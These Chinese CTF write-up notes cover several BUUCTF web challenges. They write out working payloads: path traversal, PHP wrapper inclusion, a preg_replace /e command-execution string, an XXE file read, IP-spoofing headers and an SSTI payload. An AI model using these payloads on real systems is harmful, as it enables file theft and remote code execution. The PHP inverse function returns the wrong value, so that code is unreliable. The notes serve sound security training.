[网鼎杯 2020 青龙组]filejava
上传一个文件后,有一个下载的入口
DownloadServlet?filename=…/…/…/web.xml
获取到敏感文件后,下载class
DownloadServlet?filename=…/…/…/classes/cn/abc/servlet/ListFileServlet.class DownloadServlet UploadServlet
下载flag是没有可能了
关键字java excel cve或者poi-ooxml-3.10 cve
excel和xxe漏洞的结合,CVE-2014-3529 xxe已经掌握,关键是如何引入实体 学习一下xlsx
漏洞复现 https://www.cnblogs.com/zpchcbd/p/14774132.html
[BJDCTF2020]ZJCTF,不过如此
<?php
error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
if(preg_match("/flag/",$file)){
die("Not now!");
}
include($file); //next.php
}
else{
highlight_file(__FILE__);
}
?>
?text=data://text/plain,I have a dream&file=php://filter/convert.base64-encode/resource=next.php
next.php
<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;
function complex($re, $str) {
return preg_replace(
'/(' . $re . ')/ei',
'strtolower("\\1")',
$str
);
}
foreach($_GET as $re => $str) {
echo complex($re, $str). "\n";
}
function getFlag(){
@eval($_GET['cmd']);
}
注意到preg_replace中,/e 修正符使 preg_replace() 将 replacement 参数当作 PHP 代码(在适当的逆向引用替换完之后),要确保 replacement 构成一个合法的 PHP 代码字符串,否则 PHP 会在报告在包含 preg_replace() 的行中出现语法解析错误。 深入学习:https://xz.aliyun.com/t/2557
payload:
next.php?\S*=${getFlag()}&cmd=system(‘cat /flag’);
[NCTF2019]True XML cookbook
熟悉的xxe 读取login源码没有东西,file读取
<!DOCTYPE a [
<!ENTITY exp SYSTEM "file:///proc/net/arp">
]>
<user><username>&exp;</username><password>aaaa</password></user>
发现有内网主机,直接访问报错 看wp说是考察探测内网,上爆破模块扫c段即可
[MRCTF2020]套娃
<!--
//1st
$query = $_SERVER['QUERY_STRING'];
if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){
die('Y0u are So cutE!');
}
if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){
echo "you are going to the next ~";
}
!-->
php字符串解析问题,【不行,%20可以
?b%20u%20p%20t=23333
绕过正则匹配,换行符%0a成功绕过
?b%20u%20p%20t=23333%0a
FLAG is in secrettw.php
加xxf等没用,源码获得一段jsfuck 得到
<?php
error_reporting(0);
include 'takeip.php';
ini_set('open_basedir','.');
include 'flag.php';
if(isset($_POST['Merak'])){
highlight_file(__FILE__);
die();
}
function change($v){
$v = base64_decode($v);
$re = '';
for($i=0;$i<strlen($v);$i++){
$re .= chr ( ord ($v[$i]) + $i*2 );
}
return $re;
}
echo 'Local access only!'."<br/>";
$ip = getIp();
if($ip!='127.0.0.1')
echo "Sorry,you don't have permission! Your ip is :".$ip;
if($ip === '127.0.0.1' && file_get_contents($_GET['2333']) === 'todat is a happy day' ){
echo "Your REQUEST is:".change($_GET['file']);
echo file_get_contents(change($_GET['file'])); }
?>
初步的payload:
http://fb74e97e-a006-4e4e-845e-c93a2131800c.node4.buuoj.cn:81/secrettw.php?2333=data://text/plain,todat is a happy day&file=flag.php
file经过change,change是一个简单的加密算法
逆一下:
function enchange($a){
$re = '';
for($i=0;$i<strlen($a);$i++){
$re .= chr ( ord ($a[$i]) - $i*2 );
}
$res = base64_encode($a);
return $res;
}
$decode=enchange('flag.php');
得到ZmpdYSZmXGI=
但是一直不成功,看wp是http头不对 Client-ip: 127.0.0.1才可以
x-forwarded-for: 127.0.0.1 x-remote-IP: 127.0.0.1 x-remote-ip: 127.0.0.1 x-client-ip: 127.0.0.1 x-client-IP: 127.0.0.1 X-Real-IP: 127.0.0.1 client-IP:127.0.0.1 x-originating-IP:127.0.0.1 x-remote-addr:127.0.0.1
[CISCN2019 华东南赛区]Double Secret
找到入口 会对输入进行encrypt 一顿输入发现读取文件有报错 可见模板是flask,python2.7 RC4 加密
RC4于1987年提出,和DES算法一样,是一种对称加密算法,也就是说使用的密钥为单钥(或称为私钥)。但不同于DES的是,RC4不是对明文进行分组处理,而是字节流的方式依次加密明文中的每一个字节,解密的时候也是依次对密文中的每一个字节进行解密。
可猜测密钥HereIsTreasure ,看一下wp说是存在模板注入 那么就是RC4加密+SSTI
wp给的脚本
import base64
from urllib.parse import quote
def rc4_main(key = "init_key", message = "init_message"):
# print("RC4加密主函数")
s_box = rc4_init_sbox(key)
crypt = str(rc4_excrypt(message, s_box))
return crypt
def rc4_init_sbox(key):
s_box = list(range(256)) # 我这里没管秘钥小于256的情况,小于256不断重复填充即可
# print("原来的 s 盒:%s" % s_box)
j = 0
for i in range(256):
j = (j + s_box[i] + ord(key[i % len(key)])) % 256
s_box[i], s_box[j] = s_box[j], s_box[i]
# print("混乱后的 s 盒:%s"% s_box)
return s_box
def rc4_excrypt(plain, box):
# print("调用加密程序成功。")
res = []
i = j = 0
for s in plain:
i = (i + 1) % 256
j = (j + box[i]) % 256
box[i], box[j] = box[j], box[i]
t = (box[i] + box[j]) % 256
k = box[t]
res.append(chr(ord(s) ^ k))
# print("res用于加密字符串,加密后是:%res" %res)
cipher = "".join(res)
print("加密后的字符串是:%s" %quote(cipher))
#print("加密后的输出(经过编码):")
#print(str(base64.b64encode(cipher.encode('utf-8')), 'utf-8'))
return (str(base64.b64encode(cipher.encode('utf-8')), 'utf-8'))
rc4_main("HereIsTreasure","{{''.__class__.__mro__.__getitem__(2).__subclasses__().pop(40)('/flag.txt').read()}}")
|